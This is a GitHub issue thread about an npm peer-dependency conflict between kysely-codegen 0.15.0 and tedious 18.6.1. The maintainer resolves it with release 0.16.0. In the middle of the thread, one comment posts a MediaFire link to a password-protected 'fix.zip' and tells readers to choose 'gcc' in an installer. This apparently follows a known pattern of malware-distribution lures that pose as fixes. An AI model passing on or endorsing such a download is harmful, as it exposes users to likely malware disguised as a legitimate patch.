### ISSUE TITLE
Release Bump to get kysely-codegen working with latest tedious driver

### ISSUE THREAD

**Issue by shilpsauce** [RobinBlomberg/kysely-codegen#187]
Hi, trying out kysely-codegen, but I'm running into issues installing alongside tedious 18.6.1. Seems like a new release should fix it since it looks like package.json has been updated to work with tedious ^18.0.0 on the master branch

npm install --save-dev kysely-codegen  
npm error code ERESOLVE
npm error ERESOLVE could not resolve
npm error
npm error While resolving: kysely-codegen@0.15.0
npm error Found: tedious@18.6.1
npm error node_modules/tedious
npm error   tedious@"^18.6.1" from the root project
npm error
npm error Could not resolve dependency:
npm error peerOptional tedious@"^16.6.0 || ^17.0.0" from kysely-codegen@0.15.0
npm error node_modules/kysely-codegen
npm error   dev kysely-codegen@"*" from the root project
npm error
npm error Conflicting peer dependency: tedious@17.0.0
npm error node_modules/tedious
npm error   peerOptional tedious@"^16.6.0 || ^17.0.0" from kysely-codegen@0.15.0
npm error   node_modules/kysely-codegen
npm error     dev kysely-codegen@"*" from the root project
npm error
npm error Fix the upstream dependency conflict, or retry
npm error this command with --force or --legacy-peer-deps
npm error to accept an incorrect (and potentially broken) dependency resolution.

## Upvote & Fund

- We're using [Polar.sh](https://polar.sh/RobinBlomberg) so you can upvote and help fund this issue.
- We receive the funding once the issue is completed & confirmed by you.
- Thank you in advance for helping prioritize & fund our backlog.

<a href="https://polar.sh/RobinBlomberg/kysely-codegen/issues/187">
<picture>
  <source media="(prefers-color-scheme: dark)" srcset="https://polar.sh/api/github/RobinBlomberg/kysely-codegen/issues/187/pledge.svg?darkmode=1">
  <img alt="Fund with Polar" src="https://polar.sh/api/github/RobinBlomberg/kysely-codegen/issues/187/pledge.svg">
</picture>
</a>

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by RobinBlomberg** [comment]
Should be released in [kysely-codegen@0.16.0](https://github.com/RobinBlomberg/kysely-codegen/releases/tag/0.16.0)! 🚀
